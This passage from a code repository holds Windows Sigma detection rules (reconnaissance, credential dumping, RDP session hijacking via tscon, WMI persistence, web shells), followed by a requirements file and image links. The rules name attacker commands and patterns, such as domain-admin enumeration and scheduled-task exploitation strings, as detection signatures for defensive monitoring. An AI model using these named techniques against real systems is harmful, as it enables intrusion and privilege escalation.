24 | - Windows Domains with DFL 2003 and legacy systems
25 | level: medium
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_recon_activity.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Reconnaissance Activity
2 | id: d95de845-b83c-4a9a-8a6a-4fc802ebf6c0
3 | status: experimental
4 | description: Detects suspicious command line activity on Windows systems (group membership enumeration via net.exe). The selection values contain no wildcards and are exact matches on the whole CommandLine, so variants such as net1.exe, different quoting, extra whitespace or a path prefix are not matched
5 | author: Florian Roth
6 | tags:
7 | - attack.discovery
8 | - attack.t1087
9 | logsource:
10 | category: process_creation
11 | product: windows
12 | detection:
13 | selection:
14 | CommandLine:
15 | - net group "domain admins" /domain
16 | - net localgroup administrators
17 | condition: selection
18 | fields:
19 | - CommandLine
20 | - ParentCommandLine
21 | falsepositives:
22 | - Inventory tool runs
23 | - Penetration tests
24 | - Administrative activity
25 | analysis:
26 | recommendation: Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
27 | level: medium
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_rottenpotato.yml:
--------------------------------------------------------------------------------
1 | title: RottenPotato Like Attack Pattern
2 | id: 16f5d8ca-44bd-47c8-acbe-6fc95a16c12f
3 | status: experimental
4 | description: Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like. Verify the TargetUserName value against your log source before deploying - the Security log commonly renders this account as 'ANONYMOUS LOGON' (with a space rather than an underscore) - and consider also matching the IPv6 loopback address '::1' as SourceNetworkAddress
5 | references:
6 | - https://twitter.com/SBousseaden/status/1195284233729777665
7 | author: "@SBousseaden, Florian Roth"
8 | date: 2019/11/15
9 | tags:
10 | - attack.privilege_escalation
11 | - attack.credential_access
12 | - attack.t1171
13 | logsource:
14 | product: windows
15 | service: security
16 | detection:
17 | selection:
18 | EventID: 4624
19 | LogonType: 3
20 | TargetUserName: 'ANONYMOUS_LOGON'
21 | WorkstationName: '-'
22 | SourceNetworkAddress: '127.0.0.1'
23 | condition: selection
24 | falsepositives:
25 | - Unknown
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_rundll32_by_ordinal.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Call by Ordinal
2 | id: e79a9e79-eb72-4e78-a628-0e7e8f59e89c
3 | description: Detects suspicious calls of DLLs in rundll32.dll exports by ordinal
4 | status: experimental
5 | references:
6 | - https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/
7 | - https://github.com/Neo23x0/DLLRunner
8 | - https://twitter.com/cyb3rops/status/1186631731543236608
9 | tags:
10 | - attack.defense_evasion
11 | - attack.execution
12 | - attack.t1085
13 | author: Florian Roth
14 | date: 2019/10/22
15 | logsource:
16 | category: process_creation
17 | product: windows
18 | detection:
19 | selection:
20 | CommandLine: '*\rundll32.exe *,#*'
21 | condition: selection
22 | falsepositives:
23 | - False positives depend on scripts and administrative tools used in the monitored environment
24 | - Windows control panel elements have been identified as source (mmc)
25 | level: high
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_sam_dump.yml:
--------------------------------------------------------------------------------
1 | title: SAM Dump to AppData
2 | id: 839dd1e8-eda8-4834-8145-01beeee33acd
3 | status: experimental
4 | description: Detects suspicious SAM dump activity as caused by QuarksPwDump and other password dumpers
5 | tags:
6 | - attack.credential_access
7 | - attack.t1003
8 | author: Florian Roth
9 | logsource:
10 | product: windows
11 | service: system
12 | definition: The source of this type of event is Kernel-General
13 | detection:
14 | selection:
15 | EventID: 16
16 | keywords:
17 | Message:
18 | - '*\AppData\Local\Temp\SAM-*.dmp *'
19 | condition: all of them
20 | falsepositives:
21 | - Penetration testing
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_samr_pwset.yml:
--------------------------------------------------------------------------------
1 | title: Possible Remote Password Change Through SAMR
2 | id: 7818b381-5eb1-4641-bea5-ef9e4cfb5951
3 | description: Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser(). "Audit User Account Management" in "Advanced
4 | Audit Policy Configuration" has to be enabled in your local security policy / GPO to see these events.
5 | author: Dimitrios Slamaris
6 | tags:
7 | - attack.credential_access
8 | - attack.t1212
9 | logsource:
10 | product: windows
11 | service: security
12 | detection:
13 | samrpipe:
14 | EventID: 5145
15 | RelativeTargetName: samr
16 | passwordchanged:
17 | EventID: 4738
18 | passwordchanged_filter:
19 | PasswordLastSet: null
20 | timeframe: 15s
21 | condition: ( passwordchanged and not passwordchanged_filter ) | near samrpipe
22 | level: medium
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_schtask_creation.yml:
--------------------------------------------------------------------------------
1 | title: Scheduled Task Creation
2 | id: 92626ddd-662c-49e3-ac59-f6535f12d189
3 | status: experimental
4 | description: Detects the creation of scheduled tasks in user session
5 | author: Florian Roth
6 | logsource:
7 | category: process_creation
8 | product: windows
9 | detection:
10 | selection:
11 | Image: '*\schtasks.exe'
12 | CommandLine: '* /create *'
13 | filter:
14 | User: NT AUTHORITY\SYSTEM
15 | condition: selection and not filter
16 | fields:
17 | - CommandLine
18 | - ParentCommandLine
19 | tags:
20 | - attack.execution
21 | - attack.persistence
22 | - attack.privilege_escalation
23 | - attack.t1053
24 | - attack.s0111
25 | - car.2013-08-001
26 | falsepositives:
27 | - Administrative activity
28 | - Software installation
29 | level: low
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_script_execution.yml:
--------------------------------------------------------------------------------
1 | title: WSF/JSE/JS/VBA/VBE File Execution
2 | id: 1e33157c-53b1-41ad-bbcc-780b80b58288
3 | status: experimental
4 | description: Detects suspicious file execution by wscript and cscript
5 | author: Michael Haag
6 | tags:
7 | - attack.execution
8 | - attack.t1064
9 | logsource:
10 | category: process_creation
11 | product: windows
12 | detection:
13 | selection:
14 | Image:
15 | - '*\wscript.exe'
16 | - '*\cscript.exe'
17 | CommandLine:
18 | - '*.jse'
19 | - '*.vbe'
20 | - '*.js'
21 | - '*.vba'
22 | condition: selection
23 | fields:
24 | - CommandLine
25 | - ParentCommandLine
26 | falsepositives:
27 | - Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy.
28 | level: medium
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_sdelete.yml:
--------------------------------------------------------------------------------
1 | title: Secure Deletion with SDelete
2 | id: 39a80702-d7ca-4a83-b776-525b1f86a36d
3 | status: experimental
4 | description: Detects renaming of file while deletion with SDelete tool
5 | author: Thomas Patzke
6 | references:
7 | - https://jpcertcc.github.io/ToolAnalysisResultSheet
8 | - https://www.jpcert.or.jp/english/pub/sr/ir_research.html
9 | - https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx
10 | tags:
11 | - attack.defense_evasion
12 | - attack.t1107
13 | - attack.t1066
14 | - attack.s0195
15 | logsource:
16 | product: windows
17 | service: security
18 | detection:
19 | selection:
20 | EventID:
21 | - 4656
22 | - 4663
23 | - 4658
24 | ObjectName:
25 | - '*.AAA'
26 | - '*.ZZZ'
27 | condition: selection
28 | falsepositives:
29 | - Legitimate usage of SDelete
30 | level: medium
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_security_eventlog_cleared.yml:
--------------------------------------------------------------------------------
1 | title: Security Eventlog Cleared
2 | id: f2f01843-e7b8-4f95-a35a-d23584476423
3 | description: Some threat groups tend to delete the local 'Security' Eventlog using certain utilities
4 | tags:
5 | - attack.defense_evasion
6 | - attack.t1070
7 | - car.2016-04-002
8 | author: Florian Roth
9 | logsource:
10 | product: windows
11 | service: security
12 | detection:
13 | selection:
14 | EventID:
15 | - 517
16 | - 1102
17 | condition: selection
18 | falsepositives:
19 | - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)
20 | - System provisioning (system reset before the golden image creation)
21 | level: high
22 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_svchost.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Svchost Process
2 | id: 01d2e2a1-5f09-44f7-9fc1-24faa7479b6d
3 | status: experimental
4 | description: Detects a suspicious svchost process start
5 | tags:
6 | - attack.defense_evasion
7 | - attack.t1036
8 | author: Florian Roth
9 | date: 2017/08/15
10 | logsource:
11 | category: process_creation
12 | product: windows
13 | detection:
14 | selection:
15 | Image: '*\svchost.exe'
16 | filter:
17 | ParentImage:
18 | - '*\services.exe'
19 | - '*\MsMpEng.exe'
20 | - '*\Mrt.exe'
21 | - '*\rpcnet.exe'
22 | filter_null:
23 | ParentImage: null
24 | condition: selection and not filter and not filter_null
25 | fields:
26 | - CommandLine
27 | - ParentCommandLine
28 | falsepositives:
29 | - Unknown
30 | level: high
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_sysvol_access.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious SYSVOL Domain Group Policy Access
2 | id: 05f3c945-dcc8-4393-9f3d-af65077a8f86
3 | status: experimental
4 | description: Detects Access to Domain Group Policies stored in SYSVOL
5 | references:
6 | - https://adsecurity.org/?p=2288
7 | - https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100
8 | author: Markus Neis
9 | date: 2018/04/09
10 | modified: 2018/12/11
11 | tags:
12 | - attack.credential_access
13 | - attack.t1003
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | CommandLine: '*\SYSVOL\\*\policies\\*'
20 | condition: selection
21 | falsepositives:
22 | - administrative activity
23 | level: medium
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_taskmgr_localsystem.yml:
--------------------------------------------------------------------------------
1 | title: Taskmgr as LOCAL_SYSTEM
2 | id: 9fff585c-c33e-4a86-b3cd-39312079a65f
3 | status: experimental
4 | description: Detects the creation of a taskmgr.exe process in the context of LOCAL_SYSTEM
5 | tags:
6 | - attack.defense_evasion
7 | - attack.t1036
8 | author: Florian Roth
9 | date: 2018/03/18
10 | logsource:
11 | category: process_creation
12 | product: windows
13 | detection:
14 | selection:
15 | User: NT AUTHORITY\SYSTEM
16 | Image: '*\taskmgr.exe'
17 | condition: selection
18 | falsepositives:
19 | - Unknown
20 | level: high
21 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_taskmgr_parent.yml:
--------------------------------------------------------------------------------
1 | title: Taskmgr as Parent
2 | id: 3d7679bd-0c00-440c-97b0-3f204273e6c7
3 | status: experimental
4 | description: Detects the creation of a process from Windows task manager
5 | tags:
6 | - attack.defense_evasion
7 | - attack.t1036
8 | author: Florian Roth
9 | date: 2018/03/13
10 | logsource:
11 | category: process_creation
12 | product: windows
13 | detection:
14 | selection:
15 | ParentImage: '*\taskmgr.exe'
16 | filter:
17 | Image:
18 | - '*\resmon.exe'
19 | - '*\mmc.exe'
20 | - '*\taskmgr.exe'
21 | condition: selection and not filter
22 | fields:
23 | - Image
24 | - CommandLine
25 | - ParentCommandLine
26 | falsepositives:
27 | - Administrative activity
28 | level: low
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_tscon_localsystem.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious TSCON Start
2 | id: 9847f263-4a81-424f-970c-875dab15b79b
3 | status: experimental
4 | description: Detects a tscon.exe start as LOCAL SYSTEM
5 | references:
6 | - http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
7 | - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6
8 | author: Florian Roth
9 | date: 2018/03/17
10 | tags:
11 | - attack.command_and_control
12 | - attack.t1219
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | User: NT AUTHORITY\SYSTEM
19 | Image: '*\tscon.exe'
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_tscon_rdp_redirect.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious RDP Redirect Using TSCON
2 | id: f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb
3 | status: experimental
4 | description: Detects a suspicious RDP session redirect using tscon.exe
5 | references:
6 | - http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
7 | - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6
8 | tags:
9 | - attack.lateral_movement
10 | - attack.privilege_escalation
11 | - attack.t1076
12 | - car.2013-07-002
13 | author: Florian Roth
14 | date: 2018/03/17
15 | modified: 2018/12/11
16 | logsource:
17 | category: process_creation
18 | product: windows
19 | detection:
20 | selection:
21 | CommandLine: '* /dest:rdp-tcp:*'
22 | condition: selection
23 | falsepositives:
24 | - Unknown
25 | level: high
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_whoami.yml:
--------------------------------------------------------------------------------
1 | title: Whoami Execution
2 | id: e28a5a99-da44-436d-b7a0-2afc20a5f413
3 | status: experimental
4 | description: Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation but rarely used by administrators
5 | references:
6 | - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/
7 | - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/
8 | author: Florian Roth
9 | date: 2018/08/13
10 | tags:
11 | - attack.discovery
12 | - attack.t1033
13 | - car.2016-03-001
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | Image: '*\whoami.exe'
20 | selection2:
21 | OriginalFileName: 'whoami.exe'
22 | condition: selection or selection2
23 | falsepositives:
24 | - Admin activity
25 | - Scripts and administrative tools used in the monitored environment
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_wmi_login.yml:
--------------------------------------------------------------------------------
1 | title: Login with WMI
2 | id: 5af54681-df95-4c26-854f-2565e13cfab0
3 | status: stable
4 | description: Detection of logins performed with WMI
5 | author: Thomas Patzke
6 | tags:
7 | - attack.execution
8 | - attack.t1047
9 | logsource:
10 | product: windows
11 | service: security
12 | detection:
13 | selection:
14 | EventID: 4624
15 | ProcessName: "*\\WmiPrvSE.exe"
16 | condition: selection
17 | falsepositives:
18 | - Monitoring tools
19 | - Legitimate system administration
20 | level: low
21 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_usb_device_plugged.yml:
--------------------------------------------------------------------------------
1 | title: USB Device Plugged
2 | id: 1a4bd6e3-4c6e-405d-a9a3-53a116e341d4
3 | description: Detects USB devices being plugged in
4 | references:
5 | - https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/
6 | - https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/
7 | status: experimental
8 | author: Florian Roth
9 | tags:
10 | - attack.initial_access
11 | - attack.t1200
12 | logsource:
13 | product: windows
14 | service: driver-framework
15 | detection:
16 | selection:
17 | EventID:
18 | - 2003 # Loading drivers
19 | - 2100 # Pnp or power management
20 | - 2102 # Pnp or power management
21 | condition: selection
22 | falsepositives:
23 | - Legitimate administrative activity
24 | level: low
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_user_added_to_local_administrators.yml:
--------------------------------------------------------------------------------
1 | title: User Added to Local Administrators
2 | id: c265cf08-3f99-46c1-8d59-328247057d57
3 | description: This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation
4 | activity
5 | status: stable
6 | author: Florian Roth
7 | tags:
8 | - attack.privilege_escalation
9 | - attack.t1078
10 | logsource:
11 | product: windows
12 | service: security
13 | detection:
14 | selection:
15 | EventID: 4732
16 | selection_group1:
17 | GroupName: 'Administrators'
18 | selection_group2:
19 | GroupSid: 'S-1-5-32-544'
20 | filter:
21 | SubjectUserName: '*$'
22 | condition: selection and (1 of selection_group*) and not filter
23 | falsepositives:
24 | - Legitimate administrative activity
25 | level: medium
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_user_creation.yml:
--------------------------------------------------------------------------------
1 | title: Detects local user creation
2 | id: 66b6be3d-55d0-4f47-9855-d69df21740ea
3 | description: Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma use case on your Windows
4 | server logs and not on your DC logs.
5 | status: experimental
6 | tags:
7 | - attack.persistence
8 | - attack.t1136
9 | references:
10 | - https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/
11 | author: Patrick Bareiss
12 | logsource:
13 | product: windows
14 | service: security
15 | detection:
16 | selection:
17 | EventID: 4720
18 | condition: selection
19 | fields:
20 | - EventCode
21 | - AccountName
22 | - AccountDomain
23 | falsepositives:
24 | - Domain Controller Logs
25 | - Local accounts managed by privileged account management tools
26 | level: low
27 |
28 |
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_vul_java_remote_debugging.yml:
--------------------------------------------------------------------------------
1 | title: Java Running with Remote Debugging
2 | id: 8f88e3f6-2a49-48f5-a5c4-2f7eedf78710
3 | description: Detects a Java process running with remote debugging that allows more than just localhost to connect
4 | author: Florian Roth
5 | tags:
6 | - attack.discovery
7 | - attack.t1046
8 | logsource:
9 | category: process_creation
10 | product: windows
11 | detection:
12 | selection:
13 | CommandLine: '*transport=dt_socket,address=*'
14 | exclusion:
15 | - CommandLine: '*address=127.0.0.1*'
16 | - CommandLine: '*address=localhost*'
17 | condition: selection and not exclusion
18 | fields:
19 | - CommandLine
20 | - ParentCommandLine
21 | falsepositives:
22 | - unknown
23 | level: medium
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_webshell_spawn.yml:
--------------------------------------------------------------------------------
1 | title: Shells Spawned by Web Servers
2 | id: 8202070f-edeb-4d31-a010-a26c72ac5600
3 | status: experimental
4 | description: Web servers that spawn shell processes could be the result of a successfully placed web shell or another attack
5 | author: Thomas Patzke
6 | logsource:
7 | category: process_creation
8 | product: windows
9 | detection:
10 | selection:
11 | ParentImage:
12 | - '*\w3wp.exe'
13 | - '*\httpd.exe'
14 | - '*\nginx.exe'
15 | - '*\php-cgi.exe'
16 | Image:
17 | - '*\cmd.exe'
18 | - '*\sh.exe'
19 | - '*\bash.exe'
20 | - '*\powershell.exe'
21 | condition: selection
22 | fields:
23 | - CommandLine
24 | - ParentCommandLine
25 | tags:
26 | - attack.privilege_escalation
27 | - attack.persistence
28 | - attack.t1100
29 | falsepositives:
30 | - Particular web applications may spawn a shell process legitimately
31 | level: high
32 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_win10_sched_task_0day.yml:
--------------------------------------------------------------------------------
1 | title: Windows 10 scheduled task SandboxEscaper 0-day
2 | id: 931b6802-d6a6-4267-9ffa-526f57f22aaf
3 | status: experimental
4 | description: Detects Task Scheduler .job import arbitrary DACL write
5 | references:
6 | - https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe
7 | author: Olaf Hartong
8 | date: 2019/05/22
9 | logsource:
10 | category: process_creation
11 | product: windows
12 | detection:
13 | selection:
14 | Image: schtasks.exe
15 | CommandLine: '*/change*/TN*/RU*/RP*'
16 | condition: selection
17 | falsepositives:
18 | - Unknown
19 | tags:
20 | - attack.privilege_escalation
21 | - attack.execution
22 | - attack.t1053
23 | - car.2013-08-001
24 | level: high
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_wmi_backdoor_exchange_transport_agent.yml:
--------------------------------------------------------------------------------
1 | title: WMI Backdoor Exchange Transport Agent
2 | id: 797011dc-44f4-4e6f-9f10-a8ceefbe566b
3 | status: experimental
4 | description: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters
5 | author: Florian Roth
6 | date: 2019/10/11
7 | references:
8 | - https://twitter.com/cglyer/status/1182389676876980224
9 | - https://twitter.com/cglyer/status/1182391019633029120
10 | logsource:
11 | category: process_creation
12 | product: windows
13 | tags:
14 | - attack.persistence
15 | - attack.t1084
16 | detection:
17 | selection:
18 | ParentImage: '*\EdgeTransport.exe'
19 | condition: selection
20 | falsepositives:
21 | - Unknown
22 | level: critical
23 |
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_wmi_persistence_script_event_consumer.yml:
--------------------------------------------------------------------------------
1 | title: WMI Persistence - Script Event Consumer
2 | id: ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e
3 | status: experimental
4 | description: Detects WMI script event consumers
5 | references:
6 | - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
7 | author: Thomas Patzke
8 | date: 2018/03/07
9 | tags:
10 | - attack.execution
11 | - attack.persistence
12 | - attack.t1047
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | Image: C:\WINDOWS\system32\wbem\scrcons.exe
19 | ParentImage: C:\Windows\System32\svchost.exe
20 | condition: selection
21 | falsepositives:
22 | - Legitimate event consumers
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_wmi_spwns_powershell.yml:
--------------------------------------------------------------------------------
1 | title: WMI Spawning Windows PowerShell
2 | id: 692f0bec-83ba-4d04-af7e-e884a96059b6
3 | status: experimental
4 | description: Detects WMI spawning PowerShell
5 | references:
6 | - https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_shell_spawn_susp_program.yml
7 | - https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e
8 | author: Markus Neis / @Karneades
9 | date: 2019/04/03
10 | tags:
11 | - attack.execution
12 | - attack.defense_evasion
13 | - attack.t1064
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | ParentImage:
20 | - '*\wmiprvse.exe'
21 | Image:
22 | - '*\powershell.exe'
23 | condition: selection
24 | falsepositives:
25 | - AppvClient
26 | - CCM
27 | level: high
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_workflow_compiler.yml:
--------------------------------------------------------------------------------
1 | title: Microsoft Workflow Compiler
2 | id: 419dbf2b-8a9b-4bea-bf99-7544b050ec8d
3 | status: experimental
4 | description: Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
5 | tags:
6 | - attack.defense_evasion
7 | - attack.execution
8 | - attack.t1127
9 | author: Nik Seetharaman
10 | references:
11 | - https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | Image: '*\Microsoft.Workflow.Compiler.exe'
18 | condition: selection
19 | fields:
20 | - CommandLine
21 | - ParentCommandLine
22 | falsepositives:
23 | - Legitimate MWC use (unlikely in modern enterprise environments)
24 | level: high
25 |
--------------------------------------------------------------------------------
/elemental/requirements.txt:
--------------------------------------------------------------------------------
1 | antlr4-python3-runtime==4.7.2
2 | attackcti==0.2.7
3 | certifi==2019.9.11
4 | cffi==1.13.0
5 | chardet==3.0.4
6 | Django==2.2.24
7 | django-markdownx==2.0.28
8 | gitdb2==2.0.6
9 | GitPython==3.0.3
10 | idna==2.8
11 | Markdown==3.1.1
12 | numpy==1.17.2
13 | pandas==0.25.1
14 | Pillow>=6.2.2
15 | pycparser==2.19
16 | python-dateutil==2.8.0
17 | pytz==2019.2
18 | requests==2.22.0
19 | simplejson==3.16.0
20 | six==1.12.0
21 | smmap2==2.0.5
22 | sqlparse==0.3.0
23 | stix2==1.2.1
24 | stix2-patterns==1.1.0
25 | taxii2-client==0.5.0
26 | urllib3==1.26.5
27 |
--------------------------------------------------------------------------------
/images/97.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/images/97.png
--------------------------------------------------------------------------------
/images/Atomic.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/images/Atomic.png
--------------------------------------------------------------------------------
/images/AtomicYaml.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/images/AtomicYaml.png
--------------------------------------------------------------------------------
/images/Sigma.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/images/Sigma.png
--------------------------------------------------------------------------------
/images/Technique.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/images/Technique.png
--------------------------------------------------------------------------------
/images/elementalUI.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/images/elementalUI.png
--------------------------------------------------------------------------------